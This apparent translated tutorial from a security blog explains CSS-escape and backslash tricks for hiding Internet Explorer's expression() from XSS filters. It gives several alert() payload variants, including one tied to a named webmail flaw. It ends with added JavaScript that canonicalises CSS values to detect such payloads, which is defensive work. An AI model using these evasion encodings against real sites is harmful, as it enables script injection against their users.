XSS vulnerability mining: three tips for CSS encoding and backslashes


Encodings and backslashes are basic techniques to master in XSS vulnerability mining. Here are three techniques for XSS vulnerability mining that use CSS encoding and backslashes.

Author & Translator: www.pulog.org
2010/07/17

Tip 1: change the number of zeros in the encoded value (\0X -> \00000X).
Example: <p style="xss:\65xpression(alert(/wpulog/)">
<p style="xss:\065xpression(alert(/wpulog/)">
<p style="xss:\0065xpression(alert(/wpulog/)">
The results are the same.

Tip 2: change the case of the encoded characters (\0A -> \0a).
Example: <p style="xss:expression(alert(/wpulog/)\x0d">
<p style="xss:expression(alert(/wpulog/)\x0D">
The results are the same.

Tip 3: add a whitespace character after the encoded character (IE supports \x20 and \x09; FF and Opera support \x0A and \x0D).
For example, in IE, <p style="xss:\65 xpression(alert(/wpulog/)"> also runs, with a space between \65 and x.

In addition, a backslash placed before a letter in CSS is ignored. For example, \x is equivalent to x, and \n is not equal to n. In Firefox you can also put a backslash before a line break (\x0A, \x0D), for example, <div style="xx:
\
gg">
In IE, a null character (\0) can be inserted into a CSS property value. For example, the Netease Webmail XSS vulnerability:
<p style="xss:ex&#00;pression(alert(/wpulog/)">.
Different browsers may support different encodings. For example, Firefox does not support encoded parentheses, while IE does: <p style="xss:expression\28alert\28/wpulog/\29\29"> executes normally in IE.
These techniques can be combined with other encoding methods and may yield unexpected results in XSS vulnerability mining.
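
Every variant above decodes to the same text, so a filter has to check the decoded value, not the raw attribute. The following is an added example, not code from the original article: the function names and sample values are constructed, and removing backslash-newline pairs and stripping control characters are assumptions chosen to cover the browser behaviours described above.

```javascript
// Added example: canonicalise a CSS value before checking it against a blocklist.
// Names below (decodeCssEscapes, canonicalCss, usesExpression) are hypothetical.

// Decode CSS backslash escapes:
//   \ + 1-6 hex digits, any case and zero padding, plus one optional
//     whitespace character that terminates the escape (Tips 1-3)
//   \ + line break  -> removed (treated as a line continuation)
//   \ + other char  -> that character (\x is x)
function decodeCssEscapes(value) {
  const escape = /\\(?:([0-9a-fA-F]{1,6})(?:\r\n|[ \t\r\n\f])?|(\r\n|[\r\n\f])|([^]))/g;
  return value.replace(escape, (match, hex, lineBreak, literal) => {
    if (hex !== undefined) {
      const cp = parseInt(hex, 16);
      const invalid = cp > 0x10ffff || (cp >= 0xd800 && cp <= 0xdfff);
      return invalid ? '\uFFFD' : String.fromCodePoint(cp);
    }
    return lineBreak !== undefined ? '' : literal;
  });
}

// Decode, drop NUL and other control characters (raw or produced by an
// escape such as \0), then lower-case so one pattern covers every spelling.
function canonicalCss(value) {
  return decodeCssEscapes(value)
    .replace(/[\u0000-\u001f\u007f]/g, '')
    .toLowerCase();
}

// Blocklist check run on the canonical form, never on the raw attribute.
function usesExpression(value) {
  return /expression\s*\(/.test(canonicalCss(value));
}

// Constructed sample values, modelled on the variants listed above.
const samples = [
  'xss:\\65xpression(1)',     // Tip 1: short escape
  'xss:\\000065xpression(1)', // Tip 1: zero padded
  'xss:expressi\\6Fn(1)',     // Tip 2: upper-case hex digit
  'xss:\\65 xpression(1)',    // Tip 3: whitespace after the escape
  'xss:e\\xpression(1)',      // backslash before a non-hex letter
  'xss:ex\u0000pression(1)',  // NUL inside the keyword
  'color:red',                // benign value
];
for (const s of samples) {
  console.log(JSON.stringify(s), '->', usesExpression(s));
}
```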


[+] Reference:
~~~~~~~~~
http://heideri.ch/jso/#61
